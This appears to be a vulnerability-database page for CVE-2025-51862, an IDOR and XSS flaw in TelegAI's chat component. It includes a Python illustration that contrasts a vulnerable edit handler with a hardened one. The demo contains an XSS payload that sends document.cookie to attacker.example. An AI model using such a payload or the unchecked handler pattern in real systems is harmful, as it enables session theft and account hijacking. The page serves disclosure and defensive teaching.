CVE-2025-51862

MEDIUM

TelegAI <2025-05-26 - Info Disclosure

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2025-51862. PoCs published by Secsys-FDU.

AI-analyzed exploit summary: The repository provides a detailed technical analysis of CVE-2025-51862, an IDOR vulnerability in TelegAI's chat component, allowing attackers to tamper with other users' conversations and inject malicious content. It includes a description of the attack vector, affected API, and potential impacts, but lacks functional exploit code.

Description

Insecure Direct Object Reference (IDOR) vulnerability in TelegAI (telegai.com) through 2025-05-26 in its chat component. An attacker can exploit this IDOR to tamper with other users' conversations. Additionally, malicious content and XSS payloads can be injected into those conversations, leading to phishing, user spoofing and account hijacking via XSS.
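The description above names the two defects that combine here: a chat endpoint that acts on a client-supplied conversation identifier without checking that the caller owns it (the IDOR), and rendering of the tampered message body without output encoding (the XSS). The following is an added illustration of that bug class, not code from TelegAI or from the Secsys-FDU repository; the real API, parameter names and data model are not on this page, so the in-memory store, the handler signatures and the sample users and payload are all assumptions constructed for the example.

```python
"""Illustrative IDOR plus stored-XSS pattern for a chat "edit message" handler.

Hypothetical model of the bug class described for CVE-2025-51862. The real
TelegAI API is not public on this page, so every name below is an assumption.
"""
import html
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Message:
    message_id: str
    author_id: str
    body: str


@dataclass
class Conversation:
    conversation_id: str
    owner_id: str                      # assumed "profile_id" of the chat owner
    messages: dict = field(default_factory=dict)


# Constructed sample data: two users, each owning one conversation.
STORE = {
    "conv-alice": Conversation("conv-alice", "alice", {
        "m1": Message("m1", "alice", "Hello, assistant")}),
    "conv-bob": Conversation("conv-bob", "bob", {
        "m2": Message("m2", "bob", "Meeting at 10?")}),
}


def edit_message_vulnerable(session_user: Optional[str], conversation_id: str,
                            message_id: str, new_body: str) -> str:
    """Vulnerable handler: resolves the client-supplied conversation_id directly
    (no ownership check, session_user is never consulted, so an unauthenticated
    caller works too) and stores the raw body, which viewers later render as
    HTML. Returns the body as other participants would receive it."""
    conv = STORE[conversation_id]           # direct object reference, no authz
    msg = conv.messages[message_id]
    msg.body = new_body                     # attacker-controlled, unescaped
    return msg.body


def edit_message_hardened(session_user: Optional[str], conversation_id: str,
                          message_id: str, new_body: str) -> str:
    """Hardened handler: authorization is derived from the server-side session,
    never from a client-supplied profile_id, and the body is HTML-escaped at
    render time. Not-found and not-yours collapse to one error so the endpoint
    cannot be used to enumerate other users' conversation IDs."""
    if session_user is None:
        raise PermissionError("authentication required")
    conv = STORE.get(conversation_id)
    if conv is None or conv.owner_id != session_user:
        raise PermissionError("conversation not found or not owned by caller")
    msg = conv.messages.get(message_id)
    if msg is None or msg.author_id != session_user:
        raise PermissionError("message not found or not authored by caller")
    msg.body = new_body                     # store as text ...
    return html.escape(msg.body, quote=True)  # ... encode on output


def demo():
    """Runs the attacker against both handlers and returns
    (tampered_body, attacker_blocked, owner_rendered_body)."""
    payload = ('<img src=x onerror="fetch(\'https://attacker.example/?c=\''
               '+document.cookie)">')
    # Unauthenticated attacker rewrites Bob's message via the vulnerable path.
    tampered = edit_message_vulnerable(None, "conv-bob", "m2", payload)
    # Same request against the hardened path is refused.
    try:
        edit_message_hardened(None, "conv-bob", "m2", payload)
        blocked = False
    except PermissionError:
        blocked = True
    # Bob editing his own message is allowed, but the payload is neutralised.
    rendered = edit_message_hardened("bob", "conv-bob", "m2", payload)
    return tampered, blocked, rendered


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The fix that matters is the first one: bind the object lookup to the authenticated session rather than to any identifier the client sends, since escaping alone would still let an attacker rewrite what the victim's chat says. Escaping (or a sanitizer that allows a strict tag whitelist, if rich text is required) closes the separate XSS path.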

Exploits (1)

nomisec WRITEUP
by Secsys-FDU · poc
https://github.com/Secsys-FDU/CVE-2025-51862


Classification
Writeup 90%
Attack Type
Auth Bypass
Complexity
Moderate
Reliability
Theoretical
Target: TelegAI (web application)
No auth needed
Prerequisites: Access to a shared conversation link · Knowledge of victim's profile_id
devstral-2 · analyzed Feb 18, 2026

References (1)


Scores

CVSS v3 6.1
EPSS 0.0022
EPSS Percentile 12.9%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CISA SSVC

Vulnrichment
Exploitation poc
Automatable no
Technical Impact partial

Details

CWE
CWE-79
Status published
Published Jul 22, 2025
Tracked Since Feb 18, 2026